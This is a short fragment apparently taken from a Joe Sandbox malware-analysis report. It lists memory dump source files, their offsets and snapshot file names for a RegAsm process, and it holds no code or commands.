                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd